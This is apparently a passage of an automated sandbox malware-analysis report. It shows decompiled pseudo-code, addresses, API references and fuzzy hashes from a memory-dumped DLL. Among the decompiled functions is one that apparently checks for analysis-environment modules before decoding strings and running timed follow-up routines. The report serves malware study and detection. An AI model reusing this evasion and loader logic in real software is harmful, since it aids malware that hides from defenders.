					 *0x1001e780 = _t38;
					E1000861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x1001e780 != 0) {
						goto L10;
					} else {
						E1000861A(0x1001e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x1001e780 == 0) {
						_t46 =  *0x1001e6bc; // 0x2e1fbc8
						 *0x1001e780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x1000c4ce
0x1000c4ce
0x1000c4ce
0x1000c4d1
0x1000c4dd
0x1000c4e8
0x1000c504
0x1000c509
0x1000c512
0x1000c514
0x1000c51c
0x1000c53d
0x1000c542
0x1000c54f
0x1000c55a
0x1000c561
0x1000c568
0x1000c579
0x1000c57f
0x1000c582
0x1000c599
0x1000c5a5
0x1000c5ad
0x1000c5b4
0x1000c5ba
0x1000c5c6
0x1000c5cc
0x1000c5d3
0x1000c5e6
0x1000c5d5
0x1000c5d5
0x1000c5d8
0x1000c5de
0x1000c5e3
0x1000c5e8
0x1000c5f3
0x1000c605
0x1000c617
0x00000000
0x1000c619
0x1000c620
0x00000000
0x1000c626
0x1000c627
0x1000c627
0x1000c62e
0x1000c630
0x1000c635
0x1000c635
0x1000c63a
0x1000c63e
0x1000c63e

APIs

LoadLibraryW.KERNEL32 ref: 1000C5C6
memset.MSVCRT ref: 1000C605

Strings

dll, xrefs: 1000C588
%08x, xrefs: 1000C52F

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724

Uniqueness

Uniqueness Score: -1.00%

Function 10012D70, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E10012D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10015D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10014AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10014C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10014AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x10012d76
0x10012d7b
0x10012d7f
0x10012d82
0x10012d82
0x10012d85
0x10012d8a
0x10012d8f
0x10012d92
0x10012d97
0x10012d9a
0x10012da0
0x10012da0
0x10012dab
0x10012dae
0x10012db5
0x10012dba
0x00000000
0x00000000
0x10012dc0
0x10012dc5
0x10012dc5
0x10012dca
0x10012dd0
0x10012dda
0x10012ddf
0x10012de5
0x10012e04
0x10012e07
0x10012e12
0x10012e12
0x10012e12
0x10012e09
0x10012e09
0x10012e0b
0x00000000
0x10012e0d
0x10012e0d
0x10012e0d
0x10012e0b
0x10012e1a
0x10012e1f
0x10012e24
0x10012e2a
0x10012e2e
0x10012e31
0x10012e34
0x10012e3a
0x10012e3f
0x10012e42
0x10012e48
0x10012e4d
0x10012e53
0x10012e59
0x10012e5e
0x10012e61
0x10012e66
0x10012e6a
0x10012e6e
0x10012e71
0x10012e74
0x10012e7d
0x10012e84
0x10012e87
0x10012e8a
0x10012e8f
0x10012e94
0x10012e97
0x10012e9a
0x10012e9a
0x10012e9e
0x10012ea7
0x10012eae
0x10012eb1
0x10012eb6
0x10012ebb
0x10012ebb
0x10012ebe
0x10012ec3
0x00000000
0x00000000
0x10012de7
0x10012de9
0x10012df6
0x00000000
0x00000000
0x10012df6
0x10012de9
0x00000000
0x10012de5
0x10012ec9
0x10012ece
0x10012ed1
0x10012ed4
0x10012f7f
0x10012f7f
0x10012eda
0x10012eda
0x10012eda
0x10012edf
0x10012f09
0x10012f0c
0x10012f0c
0x10012f11
0x10012f13
0x10012f15
0x10012f18
0x10012f1b
0x10012f23
0x10012f28
0x10012f28
0x10012f2e
0x10012f31
0x10012f34
0x10012f37
0x10012f39
0x10012f39
0x10012f3a
0x10012f3a
0x10012f37
0x10012f48
0x10012f4b
0x10012f4f
0x10012f54
0x10012f57
0x10012f5a
0x10012f5a
0x10012f5a
0x10012f5d
0x10012f5d
0x10012f60
0x10012f60
0x10012ee1
0x10012ee1
0x10012ef1
0x10012ef4
0x10012ef9
0x10012ef9
0x10012efc
0x10012eff
0x10012f02
0x10012f04
0x10012f04
0x10012f63
0x10012f65
0x10012f68
0x10012f68
0x10012f6e
0x10012f72
0x10012f75
0x10012f77
0x10012f77
0x10012f88
0x10012f8a
0x10012f8a
0x10012f92
0x10012fa0
0x10012fa3
0x10012fa5
0x10012fc5
0x10012fc5
0x10012fc8
0x10012fce
0x10012fcf
0x10012fd2
0x10012fd4
0x10012fd7
0x10012fda
0x10012fdd
0x10012fe1
0x10012fe4
0x10012fe7
0x10012fea
0x10012fec
0x10012fec
0x10012fef
0x10012ff1
0x10012ff1
0x10012ff4
0x10012ff6
0x10012ff9
0x10013001
0x10013004
0x10013009
0x10013009
0x1001300f
0x10013012
0x10013015
0x10013017
0x10013017
0x10013018
0x10013018
0x10013023
0x10013023
0x10013023
0x10013026
0x10013029
0x10013029
0x1001302c
0x1001302c
0x10012fef
0x1001302f
0x10013032
0x10013035
0x10013037
0x1001303a
0x1001303c
0x1001303f
0x10013042
0x10013044
0x10013047
0x1001304f
0x10013057
0x1001305a
0x1001305a
0x1001305a
0x1001305d
0x1001305d
0x1001305d
0x10013060
0x10013066
0x10013068
0x10013068
0x1001306e
0x10013074
0x1001307d
0x10013084
0x10013086
0x10013089
0x10013089
0x1001308c
0x1001308c
0x1001308f
0x10013091
0x10013094
0x10013096
0x100130b1
0x100130b1
0x100130b5
0x100130b8
0x100130bb
0x100130be
0x100130d4
0x100130d4
0x100130d4
0x100130c0
0x100130c0
0x100130c2
0x100130c6
0x100130c9
0x00000000
0x100130cb
0x100130cb
0x100130cd
0x00000000
0x100130cf
0x100130cf
0x100130cf
0x100130cd
0x100130c9
0x100130d8
0x100130db
0x100130e0
0x100130ea
0x100130ea
0x100130ea
0x100130ed
0x10013098
0x10013098
0x1001309a
0x100130a1
0x100130a1
0x100130a3
0x100130a5
0x100130a7
0x100130ab
0x100130ad
0x100130af
0x00000000
0x00000000
0x100130af
0x100130ab
0x1001309c
0x1001309c
0x1001309f
0x00000000
0x00000000
0x1001309f
0x1001309a
0x100130f7
0x100130f9
0x100130f9
0x10013104
0x10012fa7
0x10012fa7
0x10012faa
0x00000000
0x10012fac
0x10012fac
0x10012fae
0x10012fb2
0x00000000
0x10012fb4
0x10012fb4
0x10012fb4
0x10012fb7
0x00000000
0x10012fbb
0x10012fc4
0x10012fc4
0x10012fb7
0x10012fb2
0x10012faa
0x10012f96
0x10012f9f
0x10012f9f

APIs

memcpy.MSVCRT ref: 10012E7D
memcpy.MSVCRT ref: 10012EF4
memcpy.MSVCRT ref: 10012F23
memcpy.MSVCRT ref: 10012F4F
memcpy.MSVCRT ref: 10013004

Part of subcall function 10015D90: memcpy.MSVCRT ref: 10015E6E

Part of subcall function 10014AF0: memcpy.MSVCRT ref: 10014B1A

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50

Uniqueness

Uniqueness Score: -1.00%

Function 10004D6D, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x1001e688; // 0x2da0590
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
					E1000A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E1000A471( &_v556, _t298);
					 *0x1001e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E100095E1(0x1001b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x1001e688; // 0x2da0590
						_t127 = E100092E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E100085D5( &_v612);
						_t130 = E1000B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E1000861A( &_v616, 0xfffffffe);
						_t133 =  *0x1001e688; // 0x2da0590
						_t22 = _t133 + 0x114; // 0x2da06a4
						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x1001e688; // 0x2da0590
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x1001e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E1000E2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x1001e6b4; // 0x2e1fc48
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E1000E2C6(_t353,  &_v588);
								_t235 =  *0x1001e6b4; // 0x2e1fc48
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x1001e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x1001e688; // 0x2da0590
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E100049A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x1001e684; // 0x2e1faa0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x1001e688; // 0x2da0590
											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E10008604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E1000109A(_t262, 0x148);
													_t305 =  *0x1001e688; // 0x2da0590
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E1000902D(_t271,  &_v572);
													_t272 =  *0x1001e688; // 0x2da0590
													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x1001e688; // 0x2da0590
														__eflags = _t200 + 0x1020;
														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E100085D5( &_v636);
														E1000A911(_t333, 0, 0xbb8, 1);
														E1000861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E1000861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E100049A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x1001e684; // 0x2e1faa0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E10008604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E100095E1(_t278, 0x32d);
										_t280 =  *0x1001e688; // 0x2da0590
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E100085D5( &_v636);
										E1000A911(_t249, 0, 0xbb8, 1);
										E1000861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E100095E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x1001e688; // 0x2da0590
								_t329 = E100092E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E1000B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x1001e684; // 0x2e1faa0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E1000861A( &_v612, 0xfffffffe);
								}
								E100085D5( &_v616);
								_t150 =  *0x1001e688; // 0x2da0590
								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
								_t153 =  *0x1001e688; // 0x2da0590
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x1001e738, 0x105);
								_t331 =  *0x1001e688; // 0x2da0590
								_t117 = _t331 + 0x228; // 0x2da07b8
								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
								E1000861A(0x1001e740, 0xfffffffe);
								E1000861A(0x1001e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E100095C7(0x6e2);
				_v616 = _t250;
				_t326 = E100095C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E100085C2( &_v616);
					_t122 = E100085C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

0x10004d6d
0x10004d73
0x10004d79
0x10004d7e
0x10004d8c
0x10004d8f
0x10004dee
0x10004e00
0x10004e03
0x10004e0a
0x10004e0f
0x10004e14
0x10004e1b
0x10004e25
0x10004e2c
0x10004e37
0x10004e3c
0x10004e43
0x10004e49
0x10004e4b
0x10004e4c
0x10004e50
